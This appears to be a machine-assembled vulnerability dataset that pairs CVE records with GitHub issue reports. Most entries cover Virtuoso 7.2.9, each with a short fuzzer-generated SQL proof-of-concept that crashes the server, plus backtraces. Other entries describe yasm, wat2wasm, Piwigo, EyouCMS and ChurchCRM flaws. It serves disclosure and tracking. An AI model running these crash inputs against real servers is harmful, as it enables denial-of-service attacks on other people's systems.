"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1130 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE brin_test(a INTEGER NOT NULL);
INSERT INTO brin_test (a) VALUES(5);
INSERT INTO brin_test (a) VALUES(5);
ALTER TABLE brin_test ADD c1 VARCHAR(20) NOT NULL ;
UPDATE brin_test SET a = a + 1 WHERE a = 5;
```
backtrace:
```c
#0 0x5cfed5 (kc_var_col+0x1... | virtuoso 7.2.9 crashed at kc_var_col | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1130/comments | 0 | 2023-04-12T19:18:19Z | 2023-04-14T12:55:17Z | https://github.com/openlink/virtuoso-opensource/issues/1130 | 1,665,110,745 | 1,130 |
CVE-2023-31622 | 2023-05-15T15:15:12.347 | An issue in the sqlc_make_policy_trig component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1135"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1135 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
DELETE FROM ucview WHERE CURRENT OF c1;
```
backtrace:
```c
#0 0x7d8904 (sqlc_make_policy_trig+0x54)
#1 0x7ddf99 (sqlc_delete_pos+0x2e9)
#2 0x6b6e53 (sql_stmt_comp+0x453)
#3 0x6ba122 (sql_compile_1+0x1a62)
#4 0x7c8cd0 (stmt_set_query+0x340)
#5 0x7cabc2 (sf_sql_e... | virtuoso 7.2.9 crashed at sqlc_make_policy_trig | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1135/comments | 0 | 2023-04-12T19:32:30Z | 2023-04-14T08:12:14Z | https://github.com/openlink/virtuoso-opensource/issues/1135 | 1,665,127,014 | 1,135 |
CVE-2023-31623 | 2023-05-15T15:15:12.390 | An issue in the mp_box_copy component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1131"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1131 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(
x INTEGER PRIMARY KEY,
k VARCHAR
);
CREATE VIEW t1 AS SELECT k, k FROM t1;
UPDATE t1 SET k = k-1 WHERE k > 100 AND x = 128;
```
backtrace:
```c
#0 0xe086e9 (mp_box_copy+0x9)
#1 0xe08dd0 (mp_box_copy_tree+0xc0)
#2 0x815b3a (sqlc_col_t... | virtuoso 7.2.9 crashed at mp_box_copy | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1131/comments | 1 | 2023-04-12T19:21:09Z | 2023-04-14T08:41:41Z | https://github.com/openlink/virtuoso-opensource/issues/1131 | 1,665,114,015 | 1,131 |
CVE-2023-31624 | 2023-05-15T15:15:12.437 | An issue in the sinv_check_exp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1134"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1134 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE base_tbl (a int, b int);
CREATE VIEW rw_view1 AS SELECT * FROM base_tbl;
INSERT INTO rw_view1 VALUES (15);
```
backtrace:
```c
#0 0x788dc0 (sinv_check_exp+0x120)
#1 0x78a03d (sinv_sqlo_check_col_val+0xad)
#2 0x816d50 (sqlc_insert_view+0x330)
#3 0x6b... | virtuoso 7.2.9 crashed at sinv_check_exp | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1134/comments | 0 | 2023-04-12T19:29:32Z | 2023-04-14T08:12:14Z | https://github.com/openlink/virtuoso-opensource/issues/1134 | 1,665,123,657 | 1,134 |
CVE-2023-31625 | 2023-05-15T15:15:12.487 | An issue in the psiginfo component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1132"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1132 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
x LONG VARCHAR,
a INTEGER DEFAULT 0,
b LONG VARCHAR,
t2 LONG VARCHAR
);
CREATE VIEW t1 AS SELECT * FROM t1;
INSERT INTO t1(t2, x, x) VALUES('one-toasted,one-null', '', repeat('1234567890',50000));
```
backtrace:
```c
#0 0x7f42... | virtuoso 7.2.9 crashed at psiginfo (maybe the same as #1118) | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1132/comments | 1 | 2023-04-12T19:23:55Z | 2023-04-14T08:20:16Z | https://github.com/openlink/virtuoso-opensource/issues/1132 | 1,665,117,118 | 1,132 |
CVE-2023-31626 | 2023-05-15T15:15:12.540 | An issue in the gpf_notice component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1129"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1129 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | **This crash seems can only be reproduced when compiling virtuoso with --with-debug.**
**When using the docker container, the SQL statement will strangely make the client shell STUCK, but will not crash the server.**
The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t4 (
a VARCHAR,
b VARCHAR
);
... | virtuoso 7.2.9 crashed at gpf_notice | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1129/comments | 0 | 2023-04-12T19:16:37Z | 2023-04-14T08:12:13Z | https://github.com/openlink/virtuoso-opensource/issues/1129 | 1,665,108,794 | 1,129 |
CVE-2023-31627 | 2023-05-15T15:15:12.587 | An issue in the strhash component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1140"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1140 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
a varchar(255) DEFAULT NULL
);
SELECT * FROM t1 WHERE CONTAINS(*, 'tutorial & (mysql & -VÐƷWİ)');
```
backtrace:
```c
#0 0xdece40 (strhash+0x20)
#1 0xdec783 (id_hash_get+0x33)
#2 0x59c5d1 (tb_name_to_column+0x41)
#3 0x76aed1 (ot_is_defd+0x21... | virtuoso 7.2.9 crashed at strhash | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1140/comments | 0 | 2023-04-12T19:41:37Z | 2023-04-14T08:12:17Z | https://github.com/openlink/virtuoso-opensource/issues/1140 | 1,665,138,910 | 1,140 |
CVE-2023-31628 | 2023-05-15T15:15:12.633 | An issue in the stricmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1141"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1141 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
x VARCHAR,
k VARCHAR
);
CREATE VIEW t1 AS SELECT x, k FROM t1;
INSERT INTO t1 VALUES ('x', 'y');
```
backtrace:
```c
#0 0xeff7b6 (stricmp+0x6)
#1 0x607569 (strihashcmp+0x29)
#2 0xdec7af (id_hash_get+0x5f)
#3 0x607e58 (sch_name_to_object_... | virtuoso 7.2.9 crashed at stricmp (maybe the same as #1118) | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1141/comments | 1 | 2023-04-12T19:43:47Z | 2023-04-14T08:19:06Z | https://github.com/openlink/virtuoso-opensource/issues/1141 | 1,665,143,521 | 1,141 |
CVE-2023-31629 | 2023-05-15T15:15:12.677 | An issue in the sqlo_union_scope component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1139"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1139 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT CASE WHEN EXISTS (
SELECT 1 FROM t2 WHERE x=1 INTERSECT SELECT 1 FROM t2 WHERE y=2
)
THEN 1 ELSE 0 END;
```
backtrace:
```c
#0 0x76cd17 (sqlo_union_scope+0x67)
#1 0x76cd10 (sqlo_union_scope+0x60)
#2 0x76cd10 (sqlo_union_scope+0x60)
#3 0x76dc84 ... | virtuoso 7.2.9 crashed at sqlo_union_scope | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1139/comments | 0 | 2023-04-12T19:40:20Z | 2023-04-14T08:12:16Z | https://github.com/openlink/virtuoso-opensource/issues/1139 | 1,665,136,195 | 1,139 |
CVE-2023-31630 | 2023-05-15T15:15:12.723 | An issue in the sqlo_query_spec component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1138"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1138 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE mvtest_pdt1 AS (SELECT 1 AS col1) WITH DATA;
```
backtrace:
```c
#0 0x70d571 (sqlo_query_spec+0x41)
#1 0x7da2d4 (sqlc_insert+0x13b4)
#2 0x6b7387 (sql_stmt_comp+0x987)
#3 0x6ba122 (sql_compile_1+0x1a62)
#4 0x68276d (bif_exec+0x67d)
#5 0x74b044 (ins_c... | virtuoso 7.2.9 crashed at sqlo_query_spec | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1138/comments | 0 | 2023-04-12T19:38:44Z | 2023-04-14T08:12:16Z | https://github.com/openlink/virtuoso-opensource/issues/1138 | 1,665,134,343 | 1,138 |
CVE-2023-31631 | 2023-05-15T15:15:12.777 | An issue in the sqlo_preds_contradiction component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1137"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1137 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE VIEW t1(a) AS SELECT 1;
SELECT a, a, a FROM t1 WHERE a IN (1,5) AND a IN (9,8,3025,1000,3969)
ORDER BY a, a DESC;
```
backtrace:
```c
#0 0x6f6462 (sqlo_preds_contradiction+0x442)
#1 0x6fec43 (sqlo_place_table+0xe23)
#2 0x706bab (sqlo_try+0xdb)
#3 0... | virtuoso 7.2.9 crashed at sqlo_preds_contradiction | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1137/comments | 0 | 2023-04-12T19:36:18Z | 2023-04-14T08:12:15Z | https://github.com/openlink/virtuoso-opensource/issues/1137 | 1,665,131,513 | 1,137 |
CVE-2023-31699 | 2023-05-17T13:15:09.517 | ChurchCRM v4.5.4 is vulnerable to Reflected Cross-Site Scripting (XSS) via image file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/6471"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/6471"
}
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:4.5.4:*:*:*:*:*:*:*",
"matchCriteriaId": "B55D7EE2-CEB8-45EC-A48C-C0A8B90E4E53",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"79"
] | 79 | https://github.com/ChurchCRM/CRM/issues/6471 | [
"Third Party Advisory"
] | github.com | [
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
I got issue CSVImport.php page.
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Windows Ser... | XSS via Image File | https://api.github.com/repos/ChurchCRM/CRM/issues/6471/comments | 4 | 2023-04-16T18:04:50Z | 2024-05-27T02:46:17Z | https://github.com/ChurchCRM/CRM/issues/6471 | 1,670,071,780 | 6,471 |
CVE-2023-31725 | 2023-05-17T15:15:08.957 | yasm 1.3.0.55.g101bc was discovered to contain a heap-use-after-free via the function expand_mmac_params at yasm/modules/preprocs/nasm/nasm-pp.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/DaisyPo/fuzzing-vulncollect/tree/main/yasm/heap-use-after-free/nasm-pp.c:3878%20in%20expand_mmac_params"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Is... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | [
"416"
] | 416 | https://github.com/yasm/yasm/issues/221 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | # There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params
## asan info:
```
==708699==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000012a8 at pc 0x55647c385147 bp 0x7ffe09f5d870 sp 0x7ffe09f5d860
READ of size 8 at 0x60e0000012a8 thread T0
#0 0x556... | There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params | https://api.github.com/repos/yasm/yasm/issues/221/comments | 1 | 2023-04-17T16:39:42Z | 2024-03-22T11:51:42Z | https://github.com/yasm/yasm/issues/221 | 1,671,576,475 | 221 |
CVE-2023-27233 | 2023-05-17T20:15:09.933 | Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/Piwigo/Piwigo/issues/18... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "86097A18-F13B-45AC-B24B-5A879C3A2DE2",
"versionEndExcluding": "13.6.0",
"versionEndIncluding": null,
"versionStartExcludin... | [
"89"
] | 89 | https://github.com/Piwigo/Piwigo/issues/1872 | [
"Release Notes"
] | github.com | [
"Piwigo",
"Piwigo"
] | Without entering too much into details there is a possible SQL injection in file `admin/user_list_backend.php`. This file has no reason to be still in Piwigo since version 12 and the new user manager (which relies on `ws.php` as backend). This file must simply be removed. | [13.x] SQL injection on user_list_backend.php | https://api.github.com/repos/Piwigo/Piwigo/issues/1872/comments | 0 | 2023-02-24T08:42:01Z | 2023-02-24T08:42:44Z | https://github.com/Piwigo/Piwigo/issues/1872 | 1,598,184,264 | 1,872 |
CVE-2023-31708 | 2023-05-23T01:15:09.960 | A Cross-Site Request Forgery (CSRF) in EyouCMS v1.6.2 allows attackers to execute arbitrary commands via a supplying a crafted HTML file to the Upload software format function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/41"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"352"
] | 352 | https://github.com/weng-xianhu/eyoucms/issues/41 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | let's see the operation:
First,we should add the js and html in "Upload software format" .
Second,we clicked the submit,and use Burp suite to Intercept the packet.
<img width="1251" alt="屏幕截图 2023-04-16 170400" src="https://user-images.githubusercontent.com/60973265/232288495-074b92f6-7789-4a20-879d-ef7fd31a3a08.p... | Three csrf vulnerabilities, you can modify Settings, you can delete articles, you can delete users | https://api.github.com/repos/weng-xianhu/eyoucms/issues/41/comments | 0 | 2023-04-16T10:54:52Z | 2024-03-22T06:50:30Z | https://github.com/weng-xianhu/eyoucms/issues/41 | 1,669,861,738 | 41 |
CVE-2023-31669 | 2023-05-23T12:15:09.173 | WebAssembly wat2wasm v1.0.32 allows attackers to cause a libc++abi.dylib crash by putting '@' before a quote ("). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/wabt/issues/2165"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announc... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:webassembly_binary_toolkit:1.0.32:*:*:*:*:*:*:*",
"matchCriteriaId": "AFE1D9C5-6B44-494E-9964-8B5A1374C154",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | [
"116"
] | 116 | https://github.com/WebAssembly/wabt/issues/2165 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"wabt"
] | ### Describe the bug
'@' before a quote (") causes a libc++abi.dylib crash while converting ".wat" format into ".wasm" format using wat2wasm.
`wat2wasm --version`: 1.0.32 (git~1.0.32-35-g9990b0cf)
---------------
The following minimized code causes wat2wasm to crash.
```
(module (memory $mem 1)
;;(@... | '@' before a quote (") causes a libc++abi.dylib crash using wat2wasm. | https://api.github.com/repos/WebAssembly/wabt/issues/2165/comments | 2 | 2023-03-09T23:07:30Z | 2023-06-17T09:47:53Z | https://github.com/WebAssembly/wabt/issues/2165 | 1,618,118,032 | 2,165 |
CVE-2023-33359 | 2023-05-23T14:15:09.813 | Piwigo 13.6.0 is vulnerable to Cross Site Request Forgery (CSRF) in the "add tags" function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1908"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Piwigo/Pi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:*:*:*:*:*:*:*",
